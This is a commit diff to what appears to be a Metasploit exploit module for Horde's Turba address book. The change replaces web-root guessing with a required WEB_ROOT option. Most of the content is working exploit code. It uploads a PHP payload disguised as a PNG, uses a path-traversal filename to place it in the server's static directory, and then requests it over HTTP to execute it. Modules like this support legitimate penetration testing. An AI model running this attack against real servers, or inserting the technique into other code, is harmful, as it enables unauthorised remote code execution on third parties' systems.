Remove web root guessing since not reliable

modules/exploits/multi/http/horde_form_file_upload.rb

@@ -45,7 +45,8 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('TARGETURI',  [true, 'The base path to the web application', '/']),
         OptString.new('USERNAME',   [true, 'The username to authenticate with']),
         OptString.new('PASSWORD',   [true, 'The password to authenticate with']),
-        OptString.new('WEB_ROOT',   [false, 'Path to the web root'])
+        OptString.new('WEB_ROOT',   [true, 'Path to the web root', '/var/www/html'])
+        # Appears to be '/usr/share/horde/' if installed with apt
       ])
   end
 
@@ -116,54 +117,37 @@ class MetasploitModule < Msf::Exploit::Remote
 
     vprint_good("Tokens \"#{source_token}\", \"#{form_token}\", and cookie \"#{secret_cookie}\" found.")
 
-    if not webroot
+    payload_name = Rex::Text.rand_text_alpha_lower(10..12)
-      webroot_paths = [
+    payload_path = File.join(webroot, "static", "#{payload_name}.php")
-        '/var/www/html/',   # If installed with PEAR
+    payload_path_traversal = File.join("..", payload_path)
-        '/usr/share/horde/' # If installed with apt
-      ]
-    else
-      webroot_paths = [ webroot ]
-    end
 
-    for webroot_path in webroot_paths
+    data = Rex::MIME::Message.new
+    data.add_part(payload.encoded, 'image/png', nil, "form-data; name=\"object[photo][new]\"; filename=\"#{payload_name}.png\"")
+    data.add_part("turba_form_addcontact", nil, nil, 'form-data; name="formname"')
+    data.add_part(form_token, nil, nil, 'form-data; name="turba_form_addcontact_formToken"')
+    data.add_part(source_token, nil, nil, 'form-data; name="source"')
+    data.add_part(payload_path_traversal, nil, nil, 'form-data; name="object[photo][img][file]"')
+    post_data = data.to_s
 
-      payload_name = Rex::Text.rand_text_alpha_lower(10..12)
+    print_status("Uploading payload to #{payload_path_traversal}")
-      payload_path = File.join(webroot_path, "static", "#{payload_name}.php")
+    res = send_request_cgi(
-      payload_path_traversal = File.join("..", payload_path)
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri, 'turba', 'add.php'),
+      'ctype'     => "multipart/form-data; boundary=#{data.bound}",
+      'data'      => post_data,
+      'cookie'    => cookie + ' ' + secret_cookie
+    )
 
-      data = Rex::MIME::Message.new
+    fail_with(Failure::Unknown, "Unable to upload payload to #{payload_path_traversal}.") unless res && res.code == 200
-      data.add_part(payload.encoded, 'image/png', nil, "form-data; name=\"object[photo][new]\"; filename=\"#{payload_name}.png\"")
-      data.add_part("turba_form_addcontact", nil, nil, 'form-data; name="formname"')
-      data.add_part(form_token, nil, nil, 'form-data; name="turba_form_addcontact_formToken"')
-      data.add_part(source_token, nil, nil, 'form-data; name="source"')
-      data.add_part(payload_path_traversal, nil, nil, 'form-data; name="object[photo][img][file]"')
-      post_data = data.to_s
 
-      print_status("Uploading payload to #{payload_path_traversal}")
+    payload_url = normalize_uri(target_uri, 'static', "#{payload_name}.php")
-      res = send_request_cgi(
-        'method'    => 'POST',
-        'uri'       => normalize_uri(target_uri, 'turba', 'add.php'),
-        'ctype'     => "multipart/form-data; boundary=#{data.bound}",
-        'data'      => post_data,
-        'cookie'    => cookie + ' ' + secret_cookie
-      )
 
-      fail_with(Failure::Unknown, "Unable to upload payload to #{payload_path_traversal}.") unless res && res.code == 200
+    vprint_status("Executing the payload at #{payload_url}.")
-
+    res = send_request_cgi(
-      payload_url = normalize_uri(target_uri, 'static', "#{payload_name}.php")
-
-      vprint_status("Executing the payload at #{payload_url}.")
-      res = send_request_cgi(
         'uri'     => payload_url,
-        'method'  => 'GET'
+        'method'  => 'GET',
-      )
+    )
 
-      if res and res.code == 200
+    register_files_for_cleanup(payload_path)
-        register_files_for_cleanup(payload_path)
-        break
-      else
-        vprint_bad("URL #{payload_url} hasn't been created or is not callable")
-      end
-    end
   end
 end